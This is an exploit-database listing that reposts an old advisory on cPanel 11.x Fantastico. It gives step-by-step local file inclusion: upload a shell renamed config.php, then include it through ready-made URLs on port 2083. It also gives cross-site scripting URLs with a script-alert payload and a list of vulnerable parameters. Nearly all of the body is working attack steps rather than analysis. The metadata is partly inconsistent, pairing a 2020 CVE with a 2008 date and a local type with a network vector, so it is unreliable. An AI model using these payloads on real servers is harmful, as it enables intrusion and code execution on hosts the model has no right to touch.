Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-5174 | CWE-98 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Local | 2008-11-09 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N | 0.02192 | 0.50148 |
---------------------------------------------------------------- Script : Cpanel 11.x Type : Local File Inclusion & Cross Site Scripting Risk : High ---------------------------------------------------------------- Discovered by : Khashayar Fereidani **** I am 17 Years Old **** My Official Website : http://FEREIDANI.IR Team Website : http://IRCRASH.COM Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Local File Inclusion Vulnerability : Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and enter vulnerable address in url .... https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ ---------------------------------------------------------------- Cross site scripting : File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4 Set Action as Upgrade%20to%201.7.4 Vulnerable Variables : $localapp $updatedir $scriptpath_show $domain_show $thispage $thisapp $currentversion For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E ---------------------------------------------------------------- Tnx : God http://IRCRASH.COM http://FEREIDANI.IR ----------------------------------------------------------------
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.